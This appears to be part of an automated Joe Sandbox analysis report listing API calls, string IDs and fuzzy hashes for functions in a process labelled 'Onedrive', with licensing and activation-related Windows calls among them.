                                                    • Instruction ID: c1eaa55f067ee812d72e6e476923fee02c5b0873b447d9f04c9b6f5b5e97d3ad
                                                    • Opcode Fuzzy Hash: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
                                                    • Instruction Fuzzy Hash: 7A510061B0864252F710EB26E8716BF7794EBD0380F910132E6ED9E6EEDE2CD5558B40
                                                    APIs
                                                      • Part of subcall function 00007FF63EA122BC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA123D4
                                                      • Part of subcall function 00007FF63EA122BC: HeapFree.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA123E8
                                                      • Part of subcall function 00007FF63EA122BC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA1233B
                                                      • Part of subcall function 00007FF63EA122BC: HeapAlloc.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA1234F
                                                      • Part of subcall function 00007FF63EA122BC: memmove.MSVCRT(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA1237C
                                                      • Part of subcall function 00007FF63EA122BC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA12392
                                                      • Part of subcall function 00007FF63EA122BC: HeapFree.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA123A6
                                                      • Part of subcall function 00007FF63EA14918: _vsnwprintf.MSVCRT ref: 00007FF63EA14958
                                                    • StrToID.DUI70 ref: 00007FF63EA135B0
                                                    • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF63EA135C2
                                                    • ?SetInputScope@TouchEdit2@DirectUI@@QEAAJW4__MIDL___MIDL_itf_inputscope_0000_0000_0001@@@Z.DUI70 ref: 00007FF63EA135D9
                                                      • Part of subcall function 00007FF63EA1AF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1AFB3
                                                      • Part of subcall function 00007FF63EA1AF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1B05A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Direct$Process$Element@Free$AllocContentDescendent@Edit2@FindInputL___L_itf_inputscope_0000_0000_0001@@@Release@Scope@String@TouchV12@Value@Value@2@@W4___vsnwprintfmemmove
                                                    • String ID: CIDEdit%d
                                                    • API String ID: 1228671443-56484913
                                                    • Opcode ID: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
                                                    • Instruction ID: 5d136ebcf85e35bd05e84a891010c5211b00663e397aed3f6b0ee0d86fef5dbb
                                                    • Opcode Fuzzy Hash: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
                                                    • Instruction Fuzzy Hash: 1731A621708B9282EB109F62E8502BA7795FBE8B80F464535EE5DC7755DF3CE40E9720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
                                                    • API String ID: 2780765137-1254537880
                                                    • Opcode ID: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
                                                    • Instruction ID: 5dd3cf7a43b0d33dfb01ac69a825310b1debfa0d7d69695d323bf993e4b03c7c
                                                    • Opcode Fuzzy Hash: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
                                                    • Instruction Fuzzy Hash: 84215721B28A8291E750EB22E871BBEB354FF90740F821131E59E9A6DEDF6CE554C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_HandleModuleSchedulerScheduler::_
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 302703240-1276376045
                                                    • Opcode ID: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
                                                    • Instruction ID: e1157d3c5b2fe681f93af0399de83ec796f62a5220d1ab3e3c41654feb121a9a
                                                    • Opcode Fuzzy Hash: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
                                                    • Instruction Fuzzy Hash: 2B115422B1CA4691D720EB12E47166EB364FF84B94F810235E6BE5E6EDEF2CD544C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectElement@V12@$Descendent@FindRoot@
                                                    • String ID: EnterNumber
                                                    • API String ID: 1418815912-1845196359
                                                    • Opcode ID: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
                                                    • Instruction ID: b03e5f93dd6079a0c350556093c3aca0a0858fbab34876d1f5e04be504318362
                                                    • Opcode Fuzzy Hash: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
                                                    • Instruction Fuzzy Hash: 52F06D36A08B82C2DB108B12B840039BAA0FBFAB80B489171EA8E93714CF3CD4599710
                                                    APIs
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF63EA1B8B0
                                                    • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF63EA1B8C2
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF63EA1BA17
                                                    • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF63EA1BA2A
                                                      • Part of subcall function 00007FF63EA1BB50: StrToID.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB6B
                                                      • Part of subcall function 00007FF63EA1BB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB7E
                                                      • Part of subcall function 00007FF63EA1BB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB96
                                                      • Part of subcall function 00007FF63EA1AF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1AFB3
                                                      • Part of subcall function 00007FF63EA1AF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1B05A
                                                      • Part of subcall function 00007FF63EA1B6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF63EA1B9D1), ref: 00007FF63EA1B6F6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Element@String@$ContentEdit2@Touch$CaretPosition@V12@Value@$CreateDescendent@E__@@@FindRelease@Selection@Value@2@@
                                                    • String ID:
                                                    • API String ID: 94149341-0
                                                    • Opcode ID: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
                                                    • Instruction ID: 6a9e56f8adca26cc04328ad7666f7b308898b102c661f8c6567a8b80ec917cde
                                                    • Opcode Fuzzy Hash: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
                                                    • Instruction Fuzzy Hash: 45714B72B08906CBEB109FA5C4451BC23F1EBA4B84B515036EE0DD3769DF38E94AE760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp$Heap$FreeProcess
                                                    • String ID: VolumeActivationOrder
                                                    • API String ID: 1178357170-1688881641
                                                    • Opcode ID: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
                                                    • Instruction ID: af4a03f3746b1787cae7827f0ee5d76dfa2a9f7182bcd408a9e29173e86f2764
                                                    • Opcode Fuzzy Hash: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
                                                    • Instruction Fuzzy Hash: CA519222B08A12DAEB40DFA5C4913BD67A0BB64789F504539FE0ED6795CE3CE44DE360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: State$FrameHandler3::$BaseControlCurrentFromImage
                                                    • String ID:
                                                    • API String ID: 380775268-0
                                                    • Opcode ID: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
                                                    • Instruction ID: dc34b3e4f11ed184c2692100bcb6e97a438bba5ab78353cbec7fd6d20e317602
                                                    • Opcode Fuzzy Hash: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
                                                    • Instruction Fuzzy Hash: 19612D36A0CA8186D770DF16E0A176EB3A0FBC5B88F114531E6AD97B9ACF3DD5408B00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
                                                    • Instruction ID: e629907d5b6989b9f53d43b5344a6a926b5b7f9d7789fee84ffb3b19b0962cda
                                                    • Opcode Fuzzy Hash: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
                                                    • Instruction Fuzzy Hash: 9B412F22B0CB8182E750EB36E46576EB6A4EBC4780F511136E69D5BAEDDF3DD8418B00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
                                                    • Instruction ID: e83703ef03c1fde03c846b5473e0284b5b437b40497e18167e3d17d84631a41f
                                                    • Opcode Fuzzy Hash: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
                                                    • Instruction Fuzzy Hash: 82411D22B0CB8182EB509B36E56576EB7A4EBC4780F111136F69E5BAEDDF3CD4418B00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
                                                    • Instruction ID: 06cac054351a160eb14d3a01443659f43bb20a90a12e197281359d8cbfbaad50
                                                    • Opcode Fuzzy Hash: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
                                                    • Instruction Fuzzy Hash: C0410F22B0CA8182E7509B36E46176EB7A4EBC4780F110536F79D9BAEDDF3CD4409B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: String$AllocFreeInfoswscanf_s
                                                    • String ID:
                                                    • API String ID: 3357541311-0
                                                    • Opcode ID: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
                                                    • Instruction ID: 7cfe6978e5156db0edfe5f4fb6919ac046000a62363d062ee567437640b22342
                                                    • Opcode Fuzzy Hash: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
                                                    • Instruction Fuzzy Hash: 4D317422B0868286EE155F91A4503BDA652AFF9794F598034FB4EC7785DF3CE40DA720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$ErrorFieldLastSetupString
                                                    • String ID:
                                                    • API String ID: 2588027753-0
                                                    • Opcode ID: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
                                                    • Instruction ID: 409f6c0607e2af431855e646b55133da6c4258117fbb8b8fb0ec0e2f0d65a483
                                                    • Opcode Fuzzy Hash: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
                                                    • Instruction Fuzzy Hash: 5E318722B0C64386FF106BA194502BE6691FFB5784F564035FA4EC7785EE3DE809A760
                                                    APIs
                                                      • Part of subcall function 00007FF63EA14A80: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF63EA14B32), ref: 00007FF63EA14AAB
                                                      • Part of subcall function 00007FF63EA14A80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF63EA14B32), ref: 00007FF63EA14ABC
                                                    • FindResourceExW.KERNEL32 ref: 00007FF63EA14B56
                                                    • GetLastError.KERNEL32 ref: 00007FF63EA14B67
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FindQueryResourceVirtual
                                                    • String ID:
                                                    • API String ID: 571639142-0
                                                    • Opcode ID: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
                                                    • Instruction ID: 606bc154a6c32399c495a2e7f4dbcd8db694ffc0eddb71a8ee6652f22370f3be
                                                    • Opcode Fuzzy Hash: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
                                                    • Instruction Fuzzy Hash: 38216771B0C65382EB105BAAA45027965D1EFB5B54F544534FA4EC77C5EE3CE808A720
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                    • String ID:
                                                    • API String ID: 140117192-0
                                                    • Opcode ID: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
                                                    • Instruction ID: 29b19b68af6752608919d8c211cd54f7fa8f9a1557931759a0334a82276f8587
                                                    • Opcode Fuzzy Hash: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
                                                    • Instruction Fuzzy Hash: BB41E835A0AB4981EB508B0AF840365B364FBF8744F904136EA8D93765DF7DE44CE720
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CloseFreeGenerateInstallationLocalOfflineOpen
                                                    • String ID:
                                                    • API String ID: 3853244748-0
                                                    • Opcode ID: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
                                                    • Instruction ID: 74b21307bbc124cb42f1e536379801e0dd8f9d73ed1ee19238db549a59552a40
                                                    • Opcode Fuzzy Hash: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
                                                    • Instruction Fuzzy Hash: 14217F25B08B8282EB109BA2D45037EABA1FFA9BC4F044534EA4EC7785DF7CE4099710
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__vcrt_lock$Concurrency::details::_DeleteEnterSchedulerScheduler::_
                                                    • String ID:
                                                    • API String ID: 27951074-0
                                                    • Opcode ID: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
                                                    • Instruction ID: 3c2fb10265f6de6b7c1f48e09dd1ba5b9981f63f2c9a574d8c00a14f93207607
                                                    • Opcode Fuzzy Hash: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
                                                    • Instruction Fuzzy Hash: C721F425B08A4686EB20DB26E4B173973A0FB98745F410236DDED5B7E9CE3DD5118B10
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ActivationGrantsToken$CloseFreeOpen
                                                    • String ID:
                                                    • API String ID: 964983634-0
                                                    • Opcode ID: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
                                                    • Instruction ID: 56aa57177183eafbfd3468713460883392d563b858bc93bddadcf0f06a6e969b
                                                    • Opcode Fuzzy Hash: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
                                                    • Instruction Fuzzy Hash: A5218126B0864287EB144F96E4443796BA0FBA9B90F144531EA0EC3395DF3DD9489720
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Container_base12Container_base12::~_ErrorFileLastModuleName_dosmaperrstd::_
                                                    • String ID:
                                                    • API String ID: 2518310752-0
                                                    • Opcode ID: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
                                                    • Instruction ID: ecdd901d2b539c811381b6452550d44a5b6f035f7f94e73068590871001ac3d3
                                                    • Opcode Fuzzy Hash: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
                                                    • Instruction Fuzzy Hash: 77116032B18A8186DB60DB21E4657AF77A0FB84384F411135F6DE5AAADDF3CD1448F40
                                                    Strings
                                                    • D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00007FFDF3AD42C7
                                                    Memory Dump Source
